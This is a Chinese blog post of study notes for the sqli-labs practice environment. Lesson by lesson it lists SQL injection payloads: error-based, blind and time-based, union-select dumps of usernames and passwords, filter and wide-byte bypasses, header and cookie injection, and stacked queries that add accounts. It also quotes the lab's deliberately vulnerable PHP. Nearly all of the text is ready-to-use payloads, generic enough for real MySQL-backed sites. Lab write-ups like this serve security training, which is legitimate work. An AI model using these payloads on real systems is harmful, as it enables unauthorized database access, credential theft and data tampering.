sqli-less 笔记

最新推荐文章于 2024-05-03 16:47:55 发布
最新推荐文章于 2024-05-03 16:47:55 发布
阅读量436 收藏
点赞数
分类专栏: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/WYJ____/article/details/81388257
版权

一   ' 
?id=1'
?id=1' and 1=1%23
?id=1' and 1=2%23

二   数值 
?id=1'
?id=1 and 1=1%23
?id=1 and 1=2%23

三  ')
?id=1'
?id=1') and 1=1%23
?id=1') and 1=2%23

四   ")
?id=1")
?id=1") and 1=1%23
?id=1") and 1=2%23

五   '   报错
1' and updatexml(1,concat(0x23,(database())),1)%23
1' and updatexml(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)%23
1' and updatexml(1,concat(0x23,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1)%23
1' and updatexml(1,concat(0x23,(select group_concat(username,0x23,password) from security.users)),1)%23

六    "   报错
1" and updatexml(1,concat(0x23,(database())),1)%23
1" and updatexml(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)%23
1" and updatexml(1,concat(0x23,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1)%23
1" and updatexml(1,concat(0x23,(select group_concat(username,0x23,password) from security.users)),1)%23

七   ')) 盲注
1')) and length(database())=8 %23    //求数据库的长度
1')) and ascii(substr(database(),1,1))=115%23    //求数据库名的ascii值
1')) and (select count(table_name) from information_schema.tables where table_schema='security')=4%23    //求表的数量
1')) and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=101%23  //求表名的ascii码值
1')) and (select count(column_name) from information_schema.columns where table_schema='security' and table_name='users')=3%23   //求列的数量  
1')) and ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name = 'users' limit 0,1),1,1))=105 %23   //求列名的ascii码值
1')) and (select count(username) from security.users)=13 %23  //求字段的内容
1')) and ascii(substr((select concat(username,0x23,password) from security.users limit 0,1),1,1))=68%23   //求字段的ascii码值

八     '  盲注
(参考七)

九     ' 时间型盲注
?id=1' and if(length(database())>10,sleep(0),sleep(5))%23

十     " 时间型盲注
(参考九)

十一    '报错
@$sql="SELECT username,password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
username输入:admin
password输入:admin' and updatexml(1,concat(0x23,(database())),0)#
admin' and updatexml(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)#
admin' and updatexml(1,concat(0x23,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1)#
admin' and updatexml(1,concat(0x23,(select group_concat(username,0x23,password) from security.users)),1)#

十二  ")报错
$uname='"'.$uname.'"';
$passwd='"'.$passwd.'"';
@$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1";
username输入:admin
password输入:1") and updatexml(1,concat(0x7e,(database())),0)#
(参考十一)

十三   ')报错
@$sql="SELECT username, password FROM users WHERE username=('$uname') and password=('$passwd') LIMIT 0,1";
username输入:admin
password输入:admin') and updatexml(1,concat(0x7e,(database())),0)#
(参考十一)

十四  "报错
$uname='"'.$uname.'"';
$passwd='"'.$passwd.'"'; 
@$sql="SELECT username, password FROM users WHERE username=$uname and password=$passwd LIMIT 0,1";
username输入:admin
password输入:admin" and updatexml(1,concat(0x7e,(database())),0)#
(参考十一)


十五   '(布尔型、时间)盲注
@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1;
username输入:admin
password输入:admin' and sleep(if(length(database())>10,0,5))#

十六   "(布尔型、时间)盲注
$uname='"'.$uname.'"';
$passwd='"'.$passwd.'"'; 
@$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1;
username输入:admin
password输入:admin") and sleep(if(length(database())>10,0,5))#

十七   报错
@$sql="SELECT username, password FROM users WHERE username= $uname LIMIT 0,1;
$update="UPDATE users SET password = '$passwd' WHERE username='$row1'";
username   admin
password   admin' or updatexml(1,concat(0x7e,(database())),0) or '1

十八   User-Agent报错  burp拦截
username   admin
password   admin
$uagent = $_SERVER['HTTP_USER_AGENT'];
$insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";
uagent后加    1' or updatexml(1,concat(0x7e,(database())),0) or '

十九      referer报错  burp拦截
$uagent = $_SERVER['HTTP_REFERER'];
$insert="INSERT INTO `security`.`referers` (`referer`, `ip_address`) VALUES ('$uagent', '$IP')";
referer后加   1' or updatexml(1,concat(0x7e,(database())),0) or '

二十    '  burp拦截   联合查询
第一步:用某一个账号aaa登录成功
第二步:刷新页面,用burp拦截,修改cookie字段 
$sql="SELECT * FROM users WHERE username='$cookee' LIMIT 0,1";
在uname=aaa后输入    ' order by 3%23
在uname=aaa后输入    ' and 1=2 union select 1,2,3%23
在uname=aaa后输入    ' and 1=2 union select 1,database(),3%23
在uname=aaa后输入    ' and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'%23
在uname=aaa后输入    ' and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users'%23
在uname=aaa后输入    ' and 1=2 union select 1,group_concat(username,0x23,password),3 from security.users%23

二十一    ')  burp拦截   联合查询
$cookee = $_COOKIE['uname'];
$cookee = base64_decode($cookee);
$sql="SELECT * FROM users WHERE username=('$cookee') LIMIT 0,1";
与二十题基本相似,不同的是,闭合条件为单引号加括号,cookie中uname编码为base64
uname=aaa') order by 3#   ->    uname=YWEnKSBvcmRlciBieSAzIw==
uname=aaa') and 1=2 union select 1,2,3#   ->    uname=YWFhJykgYW5kIDE9MiB1bmlvbiBzZWxlY3QgMSwyLDMj
uname=') and 1=2 union select 1,2,database()#   ->    uname=JykgYW5kIDE9MiB1bmlvbiBzZWxlY3QgMSwyLGRhdGFiYXNlKCkj
(参考二十)

二十二   "   burp拦截   联合查询
$cookee = $_C
$cookee = $_COOKIE['uname'];
$cookee = base64_decode($cookee);
$cookee1 = '"'. $cookee. '"';
$sql="SELECT * FROM users WHERE username=$cookee1 LIMIT 0,1";
与二十一题基本相似,不同的是,闭合条件为双引号
(参考二十一)


二十三  '  联合查询
$reg = "/#/";
$reg1 = "/--/";
$replace = "";
$id = preg_replace($reg, $replace, $id);
$id = preg_replace($reg1, $replace, $id);
$id=$_GET['id'];
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
1' and 1=2 union select 1,2,'3
1' and 1=2 union select 1,database(),'3
1' and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security
1' and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users
1' and 1=2 union select 1,group_concat(username,0x23,password),3 from security.users where '1'='1


二十四
用户注册login_create.php
$sql = "insert into users ( username, password) values(\"$username\", \"$pass\")";、
username输入:admin'#
password随意

用户登录login.php
$username = mysql_real_escape_string($_POST["login_user"]);
$password = mysql_real_escape_string($_POST["login_password"]);
$sql = "SELECT * FROM users WHERE username='$username' and password='$password'";

密码修改pass_change.php
$username= $_SESSION["username"];
$curr_pass= mysql_real_escape_string($_POST['current_password']);
$pass= mysql_real_escape_string($_POST['password']);
$re_pass= mysql_real_escape_string($_POST['re_password']);
$sql = "UPDATE users SET PASSWORD='$pass' where username='$username' and password='$curr_pass' ";
二次排序注入

二十五     联合查询  
$id=$_GET['id'];
$id= blacklist($id);
function blacklist($id)
{
    $id= preg_replace('/or/i',"", $id);        
    $id= preg_replace('/AND/i',"", $id);
    
    return $id;
}
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
1' anandd 1=2 union select 1,2,'3
1' anandd 1=2 union select 1,database(),'3
1' anandd 1=2 union select 1,group_concat(table_name),3 from infoorrmation_schema.tables where table_schema='security
1' anandd 1=2 union select 1,group_concat(column_name),3 from infoorrmation_schema.columns where table_schema='security' anandd table_name='users
1' anandd 1=2 union select 1,group_concat(username,0x23,passwoorrd),3 from security.users where '1'='1

二十五a   联合查询
$id=$_GET['id'];
$id= blacklist($id);
function blacklist($id)
{
    $id= preg_replace('/or/i',"", $id);        
    $id= preg_replace('/AND/i',"", $id);        
    
    return $id;
}
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
$sql="SELECT * FROM users WHERE id=1 oorr updatexml(1,concat(0x23,database()),1) %23 LIMIT 0,1";

1 oorrder by 3%23
1 anandd 1=2 union select 1,2,3%23
1 anandd 1=2 union select 1,database(),3%23
1 anandd 1=2 union select 1,group_concat(table_name),3 from infoorrmation_schema.tables where table_schema='security'%23
1 anandd 1=2 union select 1,group_concat(column_name),3 from infoorrmation_schema.columns where table_schema='security' anandd table_name='users'%23
1 anandd 1=2 union select 1,group_concat(username,0x23,passwoorrd),3 from security.users%23

二十六   联合查询
$id=$_GET['id'];
$id= blacklist($id);
function blacklist($id)
{
    $id= preg_replace('/or/i',"", $id);            //strip out OR (non case sensitive)
    $id= preg_replace('/and/i',"", $id);        //Strip out AND (non case sensitive)
    $id= preg_replace('/[\/\*]/',"", $id);        //strip out /*
    $id= preg_replace('/[--]/',"", $id);        //Strip out --
    $id= preg_replace('/[#]/',"", $id);            //Strip out #
    $id= preg_replace('/[\s]/',"", $id);        //Strip out spaces
    $id= preg_replace('/[\/\\\\]/',"", $id);        //Strip out slashes
    return $id;
}
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
1'%0Banandd%0B1=2%0Bunion%0Bselect%0B1,2,'3
1'%0Banandd%0B1=2%0Bunion%0Bselect%0B1,database(),'3
1'%0Banandd%0B1=2%0Bunion%0Bselect%0B1,group_concat(table_name),3%0Bfrom%0B infoorrmation_schema.tables%0Bwhere%0B table_schema='security
1'%0Banandd%0B1=2%0Bunion%0Bselect%0B1,group_concat(column_name),3%0Bfrom%0Binfoorrmation_schema.columns%0Bwhere%0Btable_schema='security'%0banandd %0btable_name='users
1'%0Banandd%0B1=2%0Bunion%0Bselect%0B1,2,group_concat(username,0x23,passwoorrd)%0Bfrom%0Bsecurity.users%0Bwhere%0B'1'='1

二十六a联合查询
$id=$_GET['id'];
$id= blacklist($id);
function blacklist($id)
{
    $id= preg_replace('/or/i',"", $id);            //strip out OR (non case sensitive)
    $id= preg_replace('/and/i',"", $id);        //Strip out AND (non case sensitive)
    $id= preg_replace('/[\/\*]/',"", $id);        //strip out /*
    $id= preg_replace('/[--]/',"", $id);        //Strip out --
    $id= preg_replace('/[#]/',"", $id);            //Strip out #
    $id= preg_replace('/[\s]/',"", $id);        //Strip out spaces
    $id= preg_replace('/[\/\\\\]/',"", $id);        //Strip out slashes
    return $id;
}
$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";

1')%0Banandd%0B1=2%0Bunion%0Bselect%0B1,2,('3
1')%0Banandd%0B1=2%0Bunion%0Bselect%0B1,database(),('3
1')%0Banandd%0B1=2%0Bunion%0Bselect%0B1,group_concat(table_name),3%0Bfrom%0B infoorrmation_schema.tables%0Bwhere%0B table_schema=('security
1')%0Banandd%0B1=2%0Bunion%0Bselect%0B1,group_concat(column_name),3%0Bfrom%0B infoorrmation_schema.columns%0Bwhere%0Btable_schema='security'%0banandd %0btable_name=('users
1')%0Banandd%0B1=2%0Bunion%0Bselect%0B1,group_concat(username,0x23,passwoorrd),3%0bfrom%0bsecurity.users%0bwhere%0b('1'='1

二十七
function blacklist($id)
{
$id= preg_replace('/[\/\*]/',"", $id);        //strip out /*
$id= preg_replace('/[--]/',"", $id);        //Strip out --.
$id= preg_replace('/[#]/',"", $id);            //Strip out #.
$id= preg_replace('/[ +]/',"", $id);        //Strip out spaces.
$id= preg_replace('/select/m',"", $id);        //Strip out spaces.
$id= preg_replace('/[ +]/',"", $id);        //Strip out spaces.
$id= preg_replace('/union/s',"", $id);        //Strip out union
$id= preg_replace('/select/s',"", $id);        //Strip out select
$id= preg_replace('/UNION/s',"", $id);        //Strip out UNION
$id= preg_replace('/SELECT/s',"", $id);        //Strip out SELECT
$id= preg_replace('/Union/s',"", $id);        //Strip out Union
$id= preg_replace('/Select/s',"", $id);        //Strip out select
return $id;
}
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
1'%0BaNd%0B1=2%0BuNion%0BselEct%0B1,2,'3
1'%0BaNd%0B1=2%0BuNion%0BselEct%0B1,database(),'3
1'%0BaNd%0B1=2%0BuNion%0BselEct%0B1,group_concat(table_name),3%0Bfrom%0B infOrmation_schema.tables%0Bwhere%0B table_schema='security
1'%0BaNd%0B1=2%0BuNion%0BselEct%0B1,group_concat(column_name),3%0Bfrom%0B infOrmation_schema.columns%0Bwhere%0Btable_schema='security'%0band %0btable_name='users
1'%0BaNd%0B1=2%0BuNion%0BselEct%0B1,group_concat(username,0x23,passwOrd),3%0Bfrom%0B security.users%0Bwhere%0B'1'='1

二十七a
$id = '"' .$id. '"';
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
1"%0BaNd%0B1=2%0BuNion%0BselEct%0B1,2, "3
1"%0BaNd%0B1=2%0BuNion%0BselEct%0B1,database(),"3
1"%0BaNd%0B1=2%0BuNion%0BselEct%0B1,group_concat(table_name),3%0Bfrom%0B infOrmation_schema.tables%0Bwhere%0B table_schema="security
1"%0BaNd%0B1=2%0BuNion%0BselEct%0B1,group_concat(column_name),3%0Bfrom%0B infOrmation_schema.columns%0Bwhere%0Btable_schema='security'%0band %0btable_name="users
1"%0BaNd%0B1=2%0BuNion%0BselEct%0B1,group_concat(username,passwOrd),3%0Bfrom%0B security.users%0Bwhere%0B"1"="1


二十八
$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
function blacklist($id)
{
$id= preg_replace('/[\/\*]/',"", $id);                //strip out /*
$id= preg_replace('/[--]/',"", $id);                //Strip out --.
$id= preg_replace('/[#]/',"", $id);                    //Strip out #.
$id= preg_replace('/[ +]/',"", $id);                //Strip out spaces.
//$id= preg_replace('/select/m',"", $id);                    //Strip out spaces.
$id= preg_replace('/[ +]/',"", $id);                //Strip out spaces.
$id= preg_replace('/union\s+select/i',"", $id);        //Strip out UNION & SELECT.
return $id;
}
1')%0BaNd%0B1=2%0BuNion%0BselEct%0B1,2,('3
1')%0BaNd%0B1=2%0BuNion%0BselEct%0B1,database(),('3
1')%0BaNd%0B1=2%0BuNion%0BselEct%0B1,group_concat(table_name),3%0Bfrom%0B infOrmation_schema.tables%0Bwhere%0B table_schema=('security
1')%0BaNd%0B1=2%0BuNion%0BselEct%0B1,group_concat(column_name),3%0Bfrom%0B infOrmation_schema.columns%0Bwhere%0Btable_schema='security'%0band %0btable_name=('users
1')%0BaNd%0B1=2%0BuNion%0BselEct%0B1,group_concat(username,0x23,passwOrd),3%0Bfrom%0Bsecurity.users%0Bwhere%0B('1'='1

二十八a
$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
function blacklist($id)
{
//$id= preg_replace('/[\/\*]/',"", $id);                //strip out /*
//$id= preg_replace('/[--]/',"", $id);                //Strip out --.
//$id= preg_replace('/[#]/',"", $id);                    //Strip out #.
//$id= preg_replace('/[ +]/',"", $id);                //Strip out spaces.
//$id= preg_replace('/select/m',"", $id);                    //Strip out spaces.
//$id= preg_replace('/[ +]/',"", $id);                //Strip out spaces.
$id= preg_replace('/union\s+select/i',"", $id);        //Strip out spaces.
return $id;
}
1')%0Band%0B1=2%0BuNion%0BselEct%0B1,2,('3
1')%0Band%0B1=2%0BuNion%0BselEct%0B1,database(),('3
1')%0Band%0B1=2%0BuNion%0BselEct%0B1,group_concat(table_name),3%0Bfrom%0B infOrmation_schema.tables%0Bwhere%0B table_schema=('security
1')%0Band%0B1=2%0BuNion%0BselEct%0B1,group_concat(column_name),3%0Bfrom%0B infOrmation_schema.columns%0Bwhere%0Btable_schema='security'%0band%0btable_name=('users
1')%0Band%0B1=2%0BuNion%0BselEct%0B1,group_concat(username,0x23,password),3%0Bfrom%0B security.users%0Bwhere%0B('1'='1

二十九   
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
1' order by 3%23
1' and 1=2 union select 1,2,3%23
1' and 1=2 union select 1,database(),3%23
1' and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'%23
1'and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users'%23
1' and 1=2 union select 1,group_concat(username,0x23,password),3 from security.users%23


三十   
$id = '"' .$id. '"';
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
1" order by 3%23
1" and 1=2 union select 1,2,3%23
1" and 1=2 union select 1,database(),3%23
1" and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'%23
1" and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users'%23
1" and 1=2 union select 1,group_concat(username,0x23,password),3 from security.users%23

三十一
$id = '"'.$id.'"';
$sql="SELECT * FROM users WHERE id= ($id) LIMIT 0,1";
1") order by 3%23
1") and 1=2 union select 1,2,3%23
1") and 1=2 union select 1,database(),3%23
1") and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'%23
1") and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users'%23
1") and 1=2 union select 1,group_concat(username,0x23,password),3 from security.users%23

三十二  宽字节注入
$id=check_addslashes($_GET['id']);
function check_addslashes($string)
{
$string = preg_replace('/'. preg_quote('\\') .'/', "\\\\\\", $string);             
$string = preg_replace('/\'/i', '\\\'', $string);                                  
$string = preg_replace('/\"/', "\\\"", $string);                                  
    return $string;
}
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";

1%df' order by 3%23
1%df' and 1=2 union select 1,2,3%23
1%df' and 1=2 union select 1,database(),3%23
1%df' and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=0x7365637572697479%23
1%df' and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=0x7365637572697479 and table_name=0x7573657273%23
1%df' and 1=2 union select 1,group_concat(username,0x23,password),3 from security.users%23

三十三
$id=check_addslashes($_GET['id']);
function check_addslashes($string)
{
    $string= addslashes($string);    
    return $string;
}
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
1%df' order by 3%23
1%df' and 1=2 union select 1,2,3%23
1%df' and 1=2 union select 1,database(),3%23
1%df' and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=0x7365637572697479%23
1%df' and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=0x7365637572697479 and table_name=0x7573657273%23
1%df' and 1=2 union select 1,group_concat(username,0x23,password),3 from security.users%23

三十四   联合 burp拦截
$uname1=$_POST['uname'];
$passwd1=$_POST['passwd'];
$uname = addslashes($uname1);
$passwd= addslashes($passwd1);
@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
0x61646d696e(admin)   
1%df' and 1=2 union select 1,2%23
1%df' and 1=2 union select 1,database()%23
1%df' and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479%23
1%df' and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_schema=0x7365637572697479 and table_name=0x7573657273%23
1%df' and 1=2 union select 1,group_concat(username,0x23,password) from security.users%23


三十五
$string = addslashes($string);
$id=check_addslashes($_GET['id']);
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";

1 order by 3%23
1 and 1=2 union select 1,2,3%23
1 and 1=2 union select 1,database(),3%23
1 and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=0x7365637572697479%23
1 and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=0x7365637572697479 and table_name=0x7573657273%23
1 and 1=2 union select 1,group_concat(username,0x23,password),3 from security.users%23

三十六 MYSQL文件里面的my.ini里面的gbk改为Latin1 
$id=check_quotes($_GET['id']);
function check_quotes($string)
{
    $string= mysql_real_escape_string($string);    
    return $string;
}
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
1%df' and 1=2 union select 1,2,3%23
1%df' and 1=2 union select 1,database(),3%23
1%df' and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=0x7365637572697479%23
1%df' and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=0x7365637572697479 and table_name=0x7573657273%23
1%df' and 1=2 union select 1,group_concat(username,0x23,password),3 from security.users%23

三十七  burp拦截
@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
1%df' and 1=2 union select 1,2%23
1%df' and 1=2 union select 1,database()%23
1%df' and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479%23
1%df' and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_schema=0x7365637572697479 and table_name=0x7573657273%23
1%df' and 1=2 union select 1,group_concat(username,0x23,password) from security.users%23

三十八 ' 基于联合查询的堆叠注入
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
1' order by 3%23
1' and 1=2 union select 1,2,3%23
1' and 1=2 union select 1,database(),3%23
1' and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'%23
1'and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users'%23
1' and 1=2 union select 1,group_concat(username,0x23,password),3 from security.users%23
1';insert into users(username,password) values('less38','less38')%23


三十九  数值
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
1 order by 3%23
1 and 1=2 union select 1,2,3%23
1 and 1=2 union select 1,database(),3%23
1 and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'%23
1 and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users'%23
1 and 1=2 union select 1,group_concat(username,0x23,password),3 from security.users%23
(参考三十八)

四十  ')
$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
1') order by 3%23
1') and 1=2 union select 1,2,3%23
1') and 1=2 union select 1,database(),3%23
1') and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'%23
1') and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users'%23
1') and 1=2 union select 1,group_concat(username,0x23,password),3 from security.users%23
(参考三十八)

四十一
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
1 order by 3%23
1 and 1=2 union select 1,2,3%23
1 and 1=2 union select 1,database(),3%23
1 and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'%23
1 and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users'%23
1 and 1=2 union select 1,group_concat(username,0x23,password),3 from security.users%23
(参考三十八)

四十二  堆叠注入 报错
Login
$username = mysqli_real_escape_string($con1, $_POST["login_user"]);
$password = $_POST["login_password"];
$sql = "SELECT * FROM users WHERE username='$username' and password='$password'";
账号随意
密码   a';create table W like users# //添加表
密码   a';insert into users values(20,'xj','xj123')#  //添加账号密码
登录进去修改密码

四十三
Login  
$username = mysqli_real_escape_string($con1, $_POST["login_user"]);
$password = $_POST["login_password"];
$sql = "SELECT * FROM users WHERE username=('$username') and password=('$password')";
a');insert into users values(21,'xj','xj123')#
同上

四十四
$username = mysqli_real_escape_string($con1, $_POST["login_user"]);
$password = $_POST["login_password"];
$sql = "SELECT * FROM users WHERE username='$username' and password='$password'";
a';insert into users values(22,'w','w')#
同上

四十五
$username = mysqli_real_escape_string($con1, $_POST["login_user"]);
$password = $_POST["login_password"];
$sql = "SELECT * FROM users WHERE username=('$username') and password=('$password')";
a');insert into users values(23,'j','j')#
同上

四十六 报错
$id=$_GET['sort'];
$sql = "SELECT * FROM users ORDER BY $id";
sort=1 desc 或者asc,显示结果不同,表明可以注入
sort=1 and updatexml(1,concat(0x23,database()),1)
sort=1 and updatexml(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)
sort=1 and updatexml(1,concat(0x23,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1)
sort=1 and updatexml(1,concat(0x23,(select group_concat(username,0x23,password) from security.users)),1) 显示不完全

四十七
$id=$_GET['sort'];
$sql = "SELECT * FROM users ORDER BY '$id'";
sort=1' and updatexml(1,concat(0x23,database()),1)%23
sort=1' and updatexml(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)%23
sort=1' and updatexml(1,concat(0x23,(select group_concat(username,0x23,password) from security.users)),1)%23 显示不完全

四十八 错误不回显 时间盲注
$id=$_GET['sort'];
$sql = "SELECT * FROM users ORDER BY $id";
sort=1 and if(length(database())>10,sleep(0),sleep(5)) %23

四十九 错误不回显 时间盲注
$id=$_GET['sort'];
$sql = "SELECT * FROM users ORDER BY '$id'";
sort=1' and if(length(database())>10,sleep(0),sleep(5)) %23

五十 时间盲注 堆叠注入(参考上面)
$id=$_GET['sort'];
$sql="SELECT * FROM users ORDER BY $id";
sort=1 and if(length(database())>10,sleep(0),sleep(5)) %23


五十一 时间盲注
$id=$_GET['sort'];
$sql="SELECT * FROM users ORDER BY '$id'";
sort=1' and if(length(database())>10,sleep(0),sleep(5)) %23

五十二 时间盲注
$id=$_GET['sort'];
$sql="SELECT * FROM users ORDER BY $id";
sort=1 and if(length(database())>10,sleep(0),sleep(5)) %23

五十三 时间盲注
$id=$_GET['sort'];
$sql="SELECT * FROM users ORDER BY '$id'";
sort=1' and if(length(database())>10,sleep(0),sleep(5)) %23

五十四
$sql="SELECT * FROM security.users WHERE id='$id' LIMIT 0,1";
1' and 1=2 union select 1,database(),3%23
1' and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='challenges'%23
//sj7vpktxiq
1' and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='challenges' and table_name='sj7vpktxiq'%23
//id,sessid,secret_TXLH,tryy
1' and 1=2 union select 1,group_concat(sessid),3 from challenges.sj7vpktxiq%23
//d1c38a09acc34845c6be3a127a5aacaf
1' and 1=2 union select 1,group_concat(secret_TXLH),3 from challenges.sj7vpktxiq%23
//DwhfpvM0dzKLEqw9hi3PeJzY 

五十五
$sql="SELECT * FROM security.users WHERE id=($id) LIMIT 0,1";
1) and 1=2 union select 1,database(),3%23
1) and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='challenges'%23
//xwflfwldpp
1) and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='challenges' and table_name='xwflfwldpp'%23
//id,sessid,secret_DMUI,tryy
1)and 1=2 union select 1,group_concat(secret_DMUI),3 from challenges.xwflfwldpp%23
//YBNwglaRUDwbJ1Ze082Ju1Sn

五十六
$sql="SELECT * FROM security.users WHERE id=('$id') LIMIT 0,1";
1') and 1=2 union select 1,database(),3%23
1') and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='challenges'%23
//z4d4ffn83s
1') and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='challenges' and table_name='z4d4ffn83s'%23
//id,sessid,secret_Y8GA,tryy
1') and 1=2 union select 1,group_concat(secret_Y8GA),3 from challenges.z4d4ffn83s%23
//PsQNyhePjSzrPUvoEdQruEx6

五十七
$id= '"'.$id.'"';
$sql="SELECT * FROM security.users WHERE id=$id LIMIT 0,1";
1" and 1=2 union select 1,database(),3%23
1" and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='challenges'%23
//4i3eu5w9m5
1" and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='challenges' and table_name='4i3eu5w9m5'%23
//id,sessid,secret_YZ8G,tryy
1" and 1=2 union select 1,group_concat(secret_YZ8G),3 from challenges.4i3eu5w9m5%23
//kExPbOrEz78G0bfUGYmNpEJs

五十八
$sql="SELECT * FROM security.users WHERE id='$id' LIMIT 0,1";
1' and updatexml(1,concat(0x23,database()),1)%23
1' and updatexml(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema='challenges')),1)%23
//5z3vsai61i
1' and updatexml(1,concat(0x23,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='5z3vsai61i')),1)%23
//id,sessid,secret_C8ER,tryy
1' and updatexml(1,concat(0x23,(select group_concat(secret_C8ER)from challenges.5z3vsai61i)),1)%23
//hmgTXQczwr2neRRzr1m9JvWO

五十九
$sql="SELECT * FROM security.users WHERE id=$id LIMIT 0,1";
1 and updatexml(1,concat(0x23,database()),1)%23
1 and updatexml(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema='challenges')),1)%23
//h6hi5xoec7
1 and updatexml(1,concat(0x23,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='h6hi5xoec7
')),1)%23
//id,sessid,secret_AI69,tryy
1 and updatexml(1,concat(0x23,(select group_concat(secret_AI69)from challenges.h6hi5xoec7)),1)%23
//0g7eQdUtHCmXtr4o8ZySKoYg

六十
$id = '("'.$id.'")';
$sql="SELECT * FROM security.users WHERE id=$id LIMIT 0,1";
1") and updatexml(1,concat(0x23,database()),1)%23
1") and updatexml(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema='challenges')),1)%23
//uw2q08bttr
1") and updatexml(1,concat(0x23,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='uw2q08bttr')),1)%23
//id,sessid,secret_BUFB,tryy
1") and updatexml(1,concat(0x23,(select group_concat(secret_BUFB)from challenges.uw2q08bttr)),1)%23
//yJSBxWNO7xmCvhsQNNOQu2Y2

六十一
$sql="SELECT * FROM security.users WHERE id=(('$id')) LIMIT 0,1";
1')) and updatexml(1,concat(0x23,database()),1)%23
1')) and updatexml(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema='challenges')),1)%23
//avy2e9297x
